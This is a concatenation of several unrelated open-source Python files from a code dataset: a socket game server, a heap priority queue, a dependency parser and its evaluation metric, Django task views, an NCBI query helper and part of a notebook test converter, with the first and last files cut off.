这件事应该客户端来做\n # 给这个登录的人发送控制消息(准备)\n # 玩家控制.控制(消息['用户名'], 列表=[\"准备\"])\n\n # 给其他的人发送这个人连接的消息\n for 对象 in 玩家控制.玩家列表:\n if 对象.用户名 != 消息['用户']:\n 对象.发送(用户=消息['用户'], 行为='登录')\n\n elif 消息['行为'] == '准备':\n 玩家控制.搜索(消息['用户']).准备 = True\n print(f\"{消息['用户']} 已准备\")\n 玩家控制.广播(用户=消息['用户'], 行为='准备')\n # 下面这些事都应该客户端做\n # 玩家控制.广播(类型='广播', 消息=f\"{消息['用户名']} 已准备!\")\n # 玩家控制.控制(消息['用户名'], 列表=[\"disable\"])\n # 玩家控制.控制(消息['用户名'], 列表=[\"已准备,正在等待所有玩家准备\"])\n 全玩家准备 = True\n for 对象 in 玩家控制.玩家列表:\n if 对象.准备 is False:\n 全玩家准备 = False\n break\n if 全玩家准备 and len(玩家控制.玩家列表) >= 2: # and 房主开始:\n 玩家控制.广播(用户='系统', 行为=f\"游戏开始\")\n # 游戏开始\n 线程 = threading.Thread(target=游戏.启动, args=())\n 线程.start()\n pass\n\n else:\n pass\n # 玩家控制.广播(行为='广播', 消息=f\"{消息['用户名']} 选择了 {消息['消息']}!\")\n\n\nclass 玩家:\n 金币 = 0\n 手牌 = list()\n 英雄池 = list()\n 角色 = None\n 准备 = False\n 跳回合 = False\n\n def __init__(self, 用户名='', 连接=None):\n self.用户名 = 用户名\n self.连接 = 连接\n\n def 发送(self, **字典):\n print(f\"私发给 {self.用户名} :{字典}\")\n self.连接.send(json.dumps(字典).encode())\n\n # 下面这个不应该存在,因为服务器不应该直接发送控制给客户端显示\n \"\"\"\n def 控制(self, **字典):\n print(f\"私发控制给 {self.用户名} :{字典}\")\n 字典['行为'] = '控制'\n self.连接.send(json.dumps(字典).encode())\n \"\"\"\n\n\nclass 玩家控制:\n 玩家列表 = list()\n\n @classmethod\n def 广播(cls, **字典):\n print(f\"广播:{字典}\")\n for 对象 in cls.玩家列表:\n 对象.连接.send(json.dumps(字典).encode())\n\n @classmethod\n def 私发(cls, ID, **字典):\n print(f\"私发给 {ID} :{字典}\")\n cls.搜索(ID).连接.send(json.dumps(字典).encode())\n\n @classmethod\n def 控制(cls, ID, **字典):\n print(f\"私发控制给 {ID} :{字典}\")\n 字典['行为'] = '控制'\n cls.搜索(ID).连接.send(json.dumps(字典).encode())\n\n @classmethod\n def 搜索(cls, ID):\n for 对象 in cls.玩家列表:\n if 对象.用户名 == ID:\n return 对象\n\n @classmethod\n def 搜索连接(cls, 连接):\n for 对象 in cls.玩家列表:\n if 对象.连接 == 连接:\n return 对象\n return False\n\n\nclass 游戏:\n 牌堆 = list()\n 弃牌堆 = list()\n 英雄池 = list()\n 回合数 = 1\n\n @classmethod\n def 启动(cls):\n # 初始化\n for 对象 in 玩家控制.玩家列表:\n 对象.金币 = 2\n\n for 类 in server.character.角色.角色.__subclasses__():\n cls.英雄池.append(类())\n random.shuffle(cls.英雄池)\n print()\n for 玩家 in 玩家控制.玩家列表:\n 玩家.角色 = cls.英雄池.pop()\n print(玩家.角色.名字)\n\n for 类 in server.champion.英雄.英雄.__subclasses__():\n if 类.金币 >= 7:\n for x in range(1):\n cls.牌堆.append(类())\n\n elif 类.金币 >= 5:\n for x in range(3):\n cls.牌堆.append(类())\n\n elif 类.金币 >= 1:\n for x in range(4):\n cls.牌堆.append(类())\n\n # random.shuffle(cls.牌堆)\n print()\n # 每张牌3张\n for 牌 in cls.牌堆:\n print(牌.名字)\n\n\n @classmethod\n def 游戏结束(cls):\n for 玩家 in 玩家控制.玩家列表:\n 玩家.连接.close()\n 玩家控制.玩家列表.clear()\n\n\n套接字 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n套接字.bind(('127.0.0.1', 8888))\n套接字.listen(5)\nwhile True:\n 连接, 地址 = 套接字.accept()\n print('收到一个新连接', 连接.getpeername(), 连接.fileno())\n # 第一步检查版本号\n 线程 = threading.Thread(target=用户线程, args=(连接,), daemon=True)\n 线程.start()\n","sub_path":"Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"261918748","text":"import HeapSort as hs\ndef heapMaximum(a):\n return a[0]\n\ndef heapExtractMax(a):\n m = a[0]\n a[0] = a.pop()\n hs.maxHeapify(a,len(a),1)\n return m\n\n#head is 1\ndef heapIncreaseKey(a,i,key):\n a[i-1] = key \n while i > 1 and a[hs.parent(i)-1] < a[i-1]:\n a[i-1],a[hs.parent(i)-1] = a[hs.parent(i)-1],a[i-1] \n i = hs.parent(i)\n\n#test heapIncreaseKey\n#a = [16,14,10,8,7,9,3,2,4,1]\n#print(a)\n#heapIncreaseKey(a,9,15)\n#print(a)\n\ndef maxHeapInsert(a,key):\n a.append(float(\"-inf\"))\n heapIncreaseKey(a,len(a),key)\n\n#test maxHeapInsert \na = [16,14,10,8,7,9,3,2,4,1]\nprint(a)\nmaxHeapInsert(a,100)\nprint(a)","sub_path":"6堆排序/PriorityQueue.py","file_name":"PriorityQueue.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"134750034","text":"import collections\nimport os\n\nimport scrappybara.config as cfg\nfrom scrappybara.syntax.charset import Charset\nfrom scrappybara.syntax.dependencies import Dep\nfrom scrappybara.syntax.models import PDepsModel, TransModel\nfrom scrappybara.syntax.models import PTagsModel\nfrom scrappybara.syntax.tags import Tag\nfrom scrappybara.syntax.training_samples import vectorize_sentence, make_masks\nfrom scrappybara.syntax.transitions import Trans\nfrom scrappybara.syntax.wordset import Wordset\nfrom scrappybara.utils.multithreading import run_multithreads\nfrom scrappybara.utils.mutables import make_batches\nfrom scrappybara.utils.tree import Tree\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\nclass _Parse(object):\n \"\"\"Parsing a single sentence\"\"\"\n\n def __init__(self, seq_length, tag_codes, dep_codes, char_codes, word_vectors):\n \"\"\"Tokens & deps are non-padded\"\"\"\n self.__tag_codes = tag_codes\n self.__dep_codes = dep_codes\n self.__char_codes = char_codes\n self.__word_vectors = word_vectors\n self.tags = [Tag(code) for code in tag_codes[1:seq_length - 1]]\n self.__deps = [Dep(code) for code in dep_codes[1:seq_length - 1]]\n self.__buffer = collections.deque([idx for idx in range(seq_length - 2) if self.__deps[idx] != Dep.NODEP])\n self.__stack = collections.deque([])\n if self.__buffer:\n self.__shift()\n self.arcs = [] # Tuples (dep, parent_idx, child_idx)\n\n def __pdep(self, child_idx):\n pdep = self.__deps[child_idx]\n if pdep == Dep.ROOT:\n return Dep.SPLIT # ROOT cannot have any parent\n return pdep\n\n def __shift(self):\n self.__stack.append(self.__buffer.popleft())\n\n def __reduce(self):\n self.__stack.pop()\n if not self.__stack:\n self.__shift()\n\n @property\n def complete(self):\n return not self.__buffer\n\n @property\n def root(self):\n cands = set()\n cannot_be_root = set()\n for _, pdix, cidx in self.arcs:\n cands |= {pdix, cidx}\n cannot_be_root.add(cidx)\n try:\n return sorted(cands - cannot_be_root)[0]\n except IndexError:\n return None\n\n @property\n def mats(self):\n \"\"\"Materials for predicting the next transition\"\"\"\n mask_1, mask_2 = make_masks(self.__stack[-1] + 1, self.__buffer[0] + 1)\n return self.__tag_codes, self.__dep_codes, self.__char_codes, self.__word_vectors, mask_1, mask_2\n\n def register_transition(self, trans):\n if trans == Trans.LEFT:\n self.arcs.append((self.__pdep(self.__stack[-1]), self.__buffer[0], self.__stack[-1]))\n self.__reduce()\n elif trans == Trans.RIGHT:\n self.arcs.append((self.__pdep(self.__buffer[0]), self.__stack[-1], self.__buffer[0]))\n self.__shift()\n elif trans == Trans.REDUCE:\n self.__reduce()\n elif trans == Trans.SHIFT:\n self.__shift()\n\n\ndef _build_tree(parse):\n \"\"\"Converts parse to tree, returns None if no root is detected\"\"\"\n root = parse.root\n if root is None:\n return None\n else:\n tree = Tree(root)\n for dep, parent_idx, child_idx in parse.arcs:\n tree.register_child(dep, parent_idx, child_idx)\n return tree\n\n\nclass Parser(object):\n\n def __init__(self, language_model, batch_size):\n self.__batch_size = batch_size\n self.__charset = Charset().load()\n self.__wordset = Wordset(language_model).load()\n self.__ptags_model = PTagsModel(len(self.__charset)).load()\n self.__pdeps_model = PDepsModel(len(self.__charset)).load()\n self.__trans_model = TransModel(len(self.__charset)).load()\n\n def __call__(self, token_lists):\n \"\"\"Parses sentences by batch\"\"\"\n mats = run_multithreads(token_lists, self.__vectorize_sentence, cfg.NB_PROCESSES)\n batches = make_batches(mats, self.__batch_size)\n all_parses = []\n for batch in batches:\n seq_lengths, char_codes, word_vectors = zip(*batch)\n tag_codes = self.__predict_tags(char_codes, word_vectors)\n dep_codes = self.__predict_deps(tag_codes, char_codes, word_vectors)\n for idx, seq_length in enumerate(seq_lengths):\n all_parses.append(\n _Parse(seq_length, tag_codes[idx], dep_codes[idx], char_codes[idx], word_vectors[idx]))\n # Predict transitions\n incomplete_parses = [parse for parse in all_parses if not parse.complete]\n while incomplete_parses:\n parse_batches = make_batches(incomplete_parses, self.__batch_size)\n for batch in parse_batches:\n self.__predict_transitions(batch)\n incomplete_parses = [parse for parse in all_parses if not parse.complete]\n # Prepare results\n all_tags = [parse.tags for parse in all_parses]\n all_trees = run_multithreads(all_parses, _build_tree, cfg.NB_PROCESSES)\n return all_tags, all_trees\n\n def __vectorize_sentence(self, tokens):\n return vectorize_sentence(tokens, self.__charset, self.__wordset)\n\n def __predict_tags(self, char_codes, word_vectors):\n return self.__ptags_model.predict(char_codes, word_vectors)\n\n def __predict_deps(self, tag_codes, char_codes, word_vectors):\n return self.__pdeps_model.predict(tag_codes, char_codes, word_vectors)\n\n def __predict_transitions(self, parses):\n \"\"\"Predicts next transitions & registers them in place\"\"\"\n tag_codes, dep_codes, char_codes, word_vectors, masks_1, masks_2 = zip(*[parse.mats for parse in parses])\n predictions = self.__trans_model.predict(tag_codes, dep_codes, char_codes, word_vectors, masks_1, masks_2)\n for idx, trans in enumerate(predictions):\n parses[idx].register_transition(trans)\n","sub_path":"scrappybara/syntax/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"494801583","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, reverse, get_object_or_404, HttpResponse\nfrom .models import Task\nfrom likes.models import Like\nfrom comments.models import Comment\nfrom django import forms\nfrom django.forms import ModelForm\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit\nfrom django.views.generic import UpdateView,CreateView\nfrom django.db import models\nfrom django.views.decorators.csrf import csrf_exempt\nfrom jsonrpc import jsonrpc_method\nfrom jsonrpc.exceptions import Error\nfrom django.http import JsonResponse\n\ndef task_list(request):\n\n context = {\n 'tasks': Task.objects.all()\n }\n\n return render(request, 'tasks/tasks_list.html', context)\n\ndef task_detail(request, pk=None):\n task = get_object_or_404(Task, id=pk)\n like_form = LikeForm()\n form = CommentForm()\n take_form = TakeTaskForm()\n close_form = CloseTaskForm()\n\n if request.method == 'POST':\n\n if 'take' in request.POST:\n take_form = TakeTaskForm(request.POST)\n if take_form.is_valid():\n task.usertask.add(request.user)\n task.save()\n\n elif 'close' in request.POST:\n close_form = CloseTaskForm(request.POST)\n if close_form.is_valid():\n task.is_finished = True\n task.save()\n\n else:\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.task_id = pk\n comment.save()\n form = CommentForm()\n\n elif request.method == 'GET':\n Task.objects.filter(id=task.id).update(viewcount=models.F('viewcount') + 1)\n\n\n\n context ={\n 'task': task,\n 'likes': Like.objects.all().filter(is_active=True, task=task),\n 'comment_form': form,\n 'like_form' : like_form,\n 'take_form' : take_form,\n 'close_form' : close_form,\n 'comments': Comment.objects.all().filter(is_archieve=False, task=task).order_by('created')\n }\n\n return render(request, 'tasks/tasks_detail.html', context)\n\n\nclass EditTaskForm(ModelForm):\n class Meta:\n model = Task\n fields = ['name','prescription']\n\n def __init__(self,*args,**kwargs):\n super(EditTaskForm,self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_method = 'post'\n self.helper.add_input(Submit('submit','Сохранить'))\n\n\nclass TaskEdit (UpdateView):\n form_class = EditTaskForm\n context_object_name = 'task'\n template_name = 'tasks/tasks_edit.html'\n\n def get_queryset(self):\n return Task.objects.all()\n\n def get_success_url(self):\n return reverse('task:task_detail', kwargs={'pk': self.object.pk})\n\n\nclass TaskForm(ModelForm):\n class Meta:\n model = Task\n fields = ['name','prescription','categories']\n\n def __init__(self,*args,**kwargs):\n super(TaskForm,self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_method = 'post'\n self.helper.add_input(Submit('submit','Сохранить'))\n\n\nclass TaskCreate(CreateView):\n form_class = TaskForm\n context_object_name = 'task'\n template_name = 'tasks/tasks_create.html'\n\n def form_valid(self, form):\n form.instance.auth = self.request.user\n return super(TaskCreate, self).form_valid(form)\n\n def get_success_url(self):\n return reverse('task:task_detail', kwargs={'pk': self.object.pk})\n\n\nclass CommentForm(ModelForm):\n class Meta:\n model = Comment\n fields = ['text']\n\n def __init__(self, *args, **kwargs):\n super(CommentForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_method = 'post'\n self.helper.add_input(Submit('submit', 'Добавить комментарий'))\n\n\ndef task_comments(request, pk=None):\n\n task = get_object_or_404(Task, id=pk)\n context = {\n 'comments': task.task_comments.all().filter(is_archieve=False, comment=None).order_by('created')\n }\n\n return render(request, 'tasks/widjets/comments_all.html', context)\n\n\nclass AddCommentForm(ModelForm):\n class Meta:\n model = Comment\n fields = ['text']\n\n def __init__(self, *args, **kwargs):\n super(AddCommentForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.add_input(Submit('submit', 'Ответить'))\n\n\ndef count_likes(request, pk=None):\n\n task = get_object_or_404(Task, id=pk)\n\n context = {\n 'likes': task.likes.filter(is_active=True)\n }\n return render(request, 'tasks/widjets/likes.html', context)\n\n\nclass LikeForm(ModelForm):\n class Meta:\n model = Like\n fields = []\n\n def __init__(self, *args, **kwargs):\n super(LikeForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.add_input(Submit('submit', 'Лайкнуть'))\n\n\nclass TakeTaskForm(forms.Form):\n class Meta:\n model = Task\n fields = []\n\n def __init__(self, *args, **kwargs):\n super(TakeTaskForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.add_input(Submit('take', 'Взять задание'))\n\n\nclass CloseTaskForm(ModelForm):\n class Meta:\n model = Task\n fields = []\n\n def __init__(self, *args, **kwargs):\n super(CloseTaskForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.add_input(Submit('close', 'Закрыть задание'))\n\n\ndef like_add(request, pk=None):\n task = get_object_or_404(Task, id=pk)\n form = LikeForm(request.POST)\n if form.is_valid():\n if task.likes.filter(author=request.user).count() == 0:\n like = form.save(commit=False)\n like.author = request.user\n like.task = task\n like.save()\n return HttpResponse(\"OK\")\n else:\n like = task.likes.get(author=request.user)\n like.is_active = not like.is_active\n like.save()\n return HttpResponse(\"OK\")\n\n return HttpResponse(\"Failed\")\n\n\ndef task_comment_add (request, pk=None, parent_id=None):\n task = get_object_or_404(Task, id=pk)\n parent = get_object_or_404(task.task_comments, id=parent_id)\n form = AddCommentForm(request.POST)\n if request.method == 'POST':\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.task_id = pk\n comment.comment = parent\n comment.save()\n form = AddCommentForm()\n\n context = {\n 'comment_form': form,\n }\n return render(request, 'tasks/widjets/comment_add.html', context)\n\n\n@csrf_exempt\ndef get_all_tasks(request):\n tasks = Task.objects.all()\n\n tasks_json = []\n for task in tasks:\n tasks_json.append({\n 'id': task.id,\n 'auth_id': task.auth_id,\n 'name': task.name,\n 'description': task.prescription,\n 'categories_id': [obj for obj in task.categories.values_list('id', flat=True)],\n })\n\n return JsonResponse(tasks_json, safe=False)\n\n\n\n\n\n\n\n\n","sub_path":"project/source/task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"181953092","text":"from itertools import groupby\nfrom typing import Optional, List, Any, Callable\nfrom typing import Tuple\n\nimport numpy as np\nimport torch\nfrom allennlp.nn.chu_liu_edmonds import decode_mst\nfrom pytorch_lightning.metrics import Metric\nimport warnings\n\nfrom parser.metrics.attachment_scores import AttachmentScores\n\nfrom parser.utils.logger import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass T2TAttachmentScores(Metric):\n \"\"\"\n Computes labeled and unlabeled attachment scores for a\n dependency parse, as well as sentence level exact match\n for both labeled and unlabeled trees. Note that the input\n to this metric is the sampled predictions, not the distribution\n itself. This metrics is used when label and arcs are not computed\n in one single sample, but in multiple continuous samples.\n\n # Parameters\n\n ignore_classes : `List[int]`, optional (default = `None`)\n A list of label ids to ignore when computing metrics.\n \"\"\"\n\n def __init__(\n self,\n compute_on_step: bool = True,\n dist_sync_on_step: bool = False,\n process_group: Optional[Any] = None,\n dist_sync_fn: Callable = None,\n ignore_classes: List[int] = None,\n child_score_alpha: float = 1.0\n ):\n super(T2TAttachmentScores, self).__init__()\n self.normal_attachment_score = AttachmentScores(\n compute_on_step,\n dist_sync_on_step,\n process_group,\n dist_sync_fn,\n ignore_classes\n )\n self.add_state(\"to_compute_anns\", default=[], dist_reduce_fx=None)\n self.child_score_alpha = child_score_alpha\n\n def update( # type: ignore\n self,\n ann_idxs: List[int],\n word_idxs: List[int],\n sent_lens: List[int],\n parent_probs: torch.Tensor,\n parent_tag_probs: torch.Tensor,\n child_probs: torch.Tensor,\n child_tag_probs: torch.Tensor,\n span_idx: torch.Tensor,\n span_tag: torch.Tensor,\n mask: Optional[torch.BoolTensor] = None,\n ):\n \"\"\"\n # Parameters\n ann_idxs: `List`, required.\n A list of sample indexes. different querys from same sentence has same ann_idx.\n word_idxs: `List`, required.\n A list of word indexes. which word is queried.\n sent_lens: `List`, required.\n A list of sample length integers.\n parent_probs: `torch.Tensor`, required.\n A tensor of parent predictions of shape (batch_size, timesteps).\n parent_tag_probs: `torch.Tensor`, required.\n A tensor of parent tag predictions of shape (batch_size, timesteps, num_tag_classes)\n child_probs: `torch.Tensor`, required.\n A tensor of parent predictions of shape (batch_size, timesteps).\n child_tag_probs: `torch.Tensor`, required.\n A tensor of parent tag predictions of shape (batch_size, timesteps, num_tag_classes)\n span_idx : `torch.LongTensor`, required.\n A torch tensor representing the gold span position target\n in the dependency parse. Has shape `(batch_size, 2)`.\n span_tag : `torch.LongTensor`, required.\n A torch tensor representing the dependency tag. Has shape `(batch_size)`.\n mask : `torch.BoolTensor`, optional (default = `None`).\n A tensor of the same shape as `predicted_indices`. if False, mask the corresponding position\n \"\"\"\n for fields in zip(ann_idxs, word_idxs, sent_lens,\n parent_probs.detach().cpu().numpy(), parent_tag_probs.detach().cpu().numpy(),\n child_probs.detach().cpu().numpy(), child_tag_probs.detach().cpu().numpy(),\n span_idx.detach().cpu().numpy(), span_tag.detach().cpu().numpy(),\n mask.detach().cpu().numpy()):\n self.to_compute_anns.append(fields)\n\n def compute(self):\n num_tag = self.to_compute_anns[0][4].shape[-1]\n logger.info(\"grouping samples according to ann-idx ...\")\n self.to_compute_anns = sorted(self.to_compute_anns, key=lambda x: x[0])\n group_samples = [list(v) for k, v in groupby(self.to_compute_anns, lambda x: x[0])]\n logger.info(f\"grouping {len(group_samples)} sentences and running mst on all samples ...\")\n for mrc_samples in group_samples:\n sent_len = mrc_samples[0][2]\n seq_len = sent_len + 1 # add [head]\n\n if len(mrc_samples) != sent_len:\n warnings.warn(\"compute() should be called only when **all** mrc samples have been updated.\")\n continue\n\n # gather from multiple mrc samples to compute final tree\n gold_indices = torch.ones([sent_len], dtype=torch.long)\n gold_labels = torch.ones([sent_len], dtype=torch.long)\n eval_mask = torch.ones([sent_len], dtype=torch.bool)\n parent_attended_arcs = torch.zeros([seq_len, seq_len])\n parent_pairwise_head_probs = torch.zeros([seq_len, seq_len, num_tag])\n child_attended_arcs = torch.zeros([seq_len, seq_len])\n child_pairwise_head_probs = torch.zeros([seq_len, seq_len, num_tag])\n # note: timesteps==sent_len*2+3, because of mrc format.\n # parent_probs: [seq_len*2+3], parent_tag_probs: [seq_len*2+3, num_tag_classes], span_idx: 2, span_tag: 1\n for (_, word_idx, sent_len, sent_parent_probs, sent_parent_tag_probs,\n sent_child_probs, sent_child_tag_probs,\n sent_span_idx, sent_span_tag, mask) in mrc_samples:\n gold_pos = sent_span_idx[0]\n gold_indices[word_idx] = gold_pos-sent_len-2\n gold_labels[word_idx] = sent_span_tag\n eval_mask[word_idx] = bool(mask)\n context_start, context_end = sent_len + 2, 2 * sent_len + 3\n # add parent score\n parent_attended_arcs[word_idx+1] = torch.FloatTensor(sent_parent_probs[context_start: context_end])\n parent_pairwise_head_probs[word_idx+1] = torch.FloatTensor(sent_parent_tag_probs[context_start: context_end])\n # add child score\n child_attended_arcs[:, word_idx+1] = torch.FloatTensor(sent_child_probs[context_start: context_end])\n child_pairwise_head_probs[:, word_idx+1] = torch.FloatTensor(sent_child_tag_probs[context_start: context_end])\n # todo debug child score\n pairwise_head_probs = parent_pairwise_head_probs #* (child_pairwise_head_probs ** self.child_score_alpha)\n attended_arcs = parent_attended_arcs #* (child_attended_arcs ** self.child_score_alpha)\n pairwise_head_probs = pairwise_head_probs / torch.sum(pairwise_head_probs, dim=-1, keepdim=True)\n attended_arcs = attended_arcs / torch.sum(attended_arcs, dim=-1, keepdim=True)\n\n # This energy tensor expresses the following relation:\n # energy[i,j] = \"Score that i is the head of j\". In this\n # case, we have heads pointing to their children.\n batch_energy = pairwise_head_probs.permute(2, 1, 0).unsqueeze(0) \\\n * attended_arcs.transpose(0, 1).view(1, 1, seq_len, seq_len)\n\n predicted_indices, predicted_labels = self._run_mst_decoding(batch_energy, lengths=np.array([seq_len]))\n\n # We calculate attachment scores for the whole sentence\n # but excluding the symbolic ROOT token at the start,\n # which is why we start from the second element in the sequence.\n self.normal_attachment_score.update(\n predicted_indices[:, 1:], predicted_labels[:, 1:], gold_indices, gold_labels, eval_mask\n )\n\n return self.normal_attachment_score.compute()\n\n @staticmethod\n def _run_mst_decoding(\n batch_energy: torch.Tensor, lengths: torch.Tensor\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n heads = []\n head_tags = []\n for energy, length in zip(batch_energy.detach().cpu(), lengths):\n scores, tag_ids = energy.max(dim=0)\n # Although we need to include the root node so that the MST includes it,\n # we do not want any word to be the parent of the root node.\n # Here, we enforce this by setting the scores for all word -> ROOT edges\n # edges to be 0.\n scores[0, :] = 0\n # Decode the heads. Because we modify the scores to prevent\n # adding in word -> ROOT edges, we need to find the labels ourselves.\n instance_heads, _ = decode_mst(scores.numpy(), length, has_labels=False)\n\n # Find the labels which correspond to the edges in the max spanning tree.\n instance_head_tags = []\n for child, parent in enumerate(instance_heads):\n instance_head_tags.append(tag_ids[parent, child].item())\n # We don't care what the head or tag is for the root token, but by default it's\n # not necessarily the same in the batched vs unbatched case, which is annoying.\n # Here we'll just set them to zero.\n instance_heads[0] = 0\n instance_head_tags[0] = 0\n heads.append(instance_heads)\n head_tags.append(instance_head_tags)\n return (\n torch.from_numpy(np.stack(heads)).to(batch_energy.device),\n torch.from_numpy(np.stack(head_tags)).to(batch_energy.device),\n )\n","sub_path":"parser/metrics/t2t_attachment_scores.py","file_name":"t2t_attachment_scores.py","file_ext":"py","file_size_in_byte":9458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"396548944","text":"#!/usr/bin/env python\nimport requests\nimport re\n\ndef functionRefSeq(organism,query,database,option,list_id) :\n url=\"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db={}&term={}[Organism]+{}[Gene Name]&idtype=acc&retmode=json\".format(database,organism,query)\n r=requests.get(url)\n if not r.ok :\n list_id+=[\"No Data Available\"]\n else :\n decoded = r.json()\n result=repr(decoded[\"esearchresult\"][\"idlist\"])\n list_id=re.findall(\"[NX]{}_\\d+.\\d\".format(option),result)\n return(list_id)","sub_path":"Morgane/refseq.py","file_name":"refseq.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"124732753","text":"\"\"\"Cell functions.\"\"\"\nfrom collections import defaultdict\nfrom tokenize import (untokenize, NEWLINE, NAME, OP)\nimport re\nimport shlex\nimport os\nimport nbformat\nimport celltest\nfrom celltest.utils import (glue, _tokenize, indent, replace_asserts,\n save_outputs, remove_docstring,\n get_template_from_file, get_notebook_name,\n get_template_file, logger, root_logger,\n parse_params)\nfrom celltest.funclib import get_outputs\n\n\nclass CellConvert():\n \"\"\"Notebook convert.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Read all relevant info from notebook.\"\"\"\n # default values\n default_kwargs = {\n \"filepath\": None,\n \"callbacks\": [],\n \"insert_saved_outputs\": True,\n \"output_file\": None,\n \"header_file\": None,\n \"standard_template\": None,\n \"custom_template\": None,\n \"verbose\": False,\n }\n self.accepted = {\n \"params\": [\n \"comment\", \"setup\", \"ignore_outputs\", \"ignore_stderr\",\n \"ignore_stdout\", \"ignore\", \"ignore_display_data\", \"run_all_till_now\"\n ],\n \"callbacks\": [(\"black\",), (\"yapf\", \"-i\"), (\"isort\",)]\n }\n\n # check params\n for kwarg in kwargs:\n if kwarg not in default_kwargs:\n raise ValueError(\"Unknown parameter: %s\" % kwarg)\n self.kwargs = default_kwargs.copy()\n self.kwargs.update(kwargs)\n for callback in self.kwargs[\"callbacks\"]:\n if callback not in [x[0] for x in self.accepted[\"callbacks\"]]:\n raise ValueError(\"Unknown callback: %s\" % callback)\n\n if self.kwargs[\"verbose\"]:\n logger.setLevel('DEBUG')\n else:\n logger.setLevel(root_logger.handlers[0].level)\n\n # get input filepath. If not provided assuming we're in notebook environment\n # and current file is the one to be transformed\n if self.kwargs[\"filepath\"] is None:\n try:\n self.filepath = get_notebook_name()\n except Exception as excp:\n raise ValueError(\n \"Notebook name not provided and could \"\n \"not be derived from current environment. Please \"\n \"provide notebook name(s) that has to be converted\") from excp\n else:\n self.filepath = os.path.join(os.getcwd(), self.kwargs[\"filepath\"])\n\n # read template\n template_file = get_template_file(self.kwargs[\"standard_template\"],\n self.kwargs[\"custom_template\"])\n self.templ = get_template_from_file(template_file)\n if not self.templ:\n raise ValueError(\"Could no read template from file %s\" %\n self.kwargs[\"template_file\"])\n\n # gather header control params\n self.control_params_d = defaultdict(dict)\n for header_line in [\"insert_saved_outputs\", \"header_file\"]:\n if self.kwargs[header_line]:\n self.control_params_d[\"head_level\"][header_line] = True\n\n # gather replacements for the template file\n self.replacements = {} # defaultdict(lambda: None)\n with open(os.path.join(os.path.dirname(celltest.__file__),\n \"funclib.py\")) as funclib_file:\n self.replacements[\"funclib\"] = remove_docstring(funclib_file.read())\n if self.kwargs[\"header_file\"]:\n with open(kwargs[\"header_file\"]) as file_:\n self.replacements[\"header_file\"] = file_.read()\n self.replacements[\"accepted_params\"] = self.accepted[\"params\"]\n self.replacements[\"accepted_callbacks\"] = \", \".join(\n x[0] for x in self.accepted[\"callbacks\"])\n self.replacements[\"filefullpath\"] = self.filepath\n self.replacements[\"notebook_name\"] = os.path.split(self.filepath)[1]\n\n # gather code, outputs, and metadata\n self.code_d_ = {} # this will be changing\n self.metadata_d = {}\n self.ct_saved_cell_outputs = get_outputs(self.filepath, pretty_quotes=True)\n with open(self.filepath) as file:\n self.cells = nbformat.read(file, nbformat.NO_CONVERT).cells\n # for ease of usage read all relevant cells into separate lists\n for index, cell in enumerate(self.cells):\n if cell.cell_type == \"code\":\n self.code_d_[index] = cell.source\n if \"celltest\" in cell.metadata:\n self.metadata_d[index] = cell.metadata.celltest\n\n # get file name where to write the results\n path, name = os.path.split(self.filepath)\n name = os.path.splitext(name)[0]\n if self.kwargs[\"output_file\"]:\n self.output = self.kwargs[\"output_file\"]\n else:\n self.output = os.path.join(path, \"test_\" + name + \".py\")\n\n def carve_magic(self, update=True):\n \"\"\"Carve out notebook magic.\"\"\"\n clean_code_d = {}\n magic_code_d_ = {}\n for cell_index, cell in self.code_d_.items():\n lines = cell.split(\"\\n\")\n if lines[0].strip().startswith(\"%\"):\n magic_code_d_[cell_index] = lines[0]\n clean_code_d[cell_index] = \"\\n\".join(lines[1:])\n else:\n clean_code_d[cell_index] = cell\n if update:\n self.code_d_ = clean_code_d\n return magic_code_d_, clean_code_d\n\n def carve_control_params(self, update=True):\n \"\"\"Read control params from comments or metadata.\"\"\"\n control_params_d = defaultdict(dict)\n clean_code_d = {}\n\n # params first get collected from metadata\n for cell_index, metadata in self.metadata_d.items():\n params_d = parse_params(metadata, self.accepted[\"params\"])\n control_params_d[cell_index].update(params_d)\n\n # then from cell itself, if conflict cell params have priority\n for cell_index, cell in self.code_d_.items():\n lines = cell.split(\"\\n\")\n if lines[0].strip().startswith(\"%\"):\n lines.pop(0)\n params_string = re.match(r\"^#\\s+CT:(.*)\", lines[0].strip())\n if params_string:\n params_string_ = params_string[1]\n clean_code_d[cell_index] = \"\\n\".join(lines[1:])\n else:\n params_string_ = \"\"\n clean_code_d[cell_index] = cell\n\n params_d = parse_params(\n 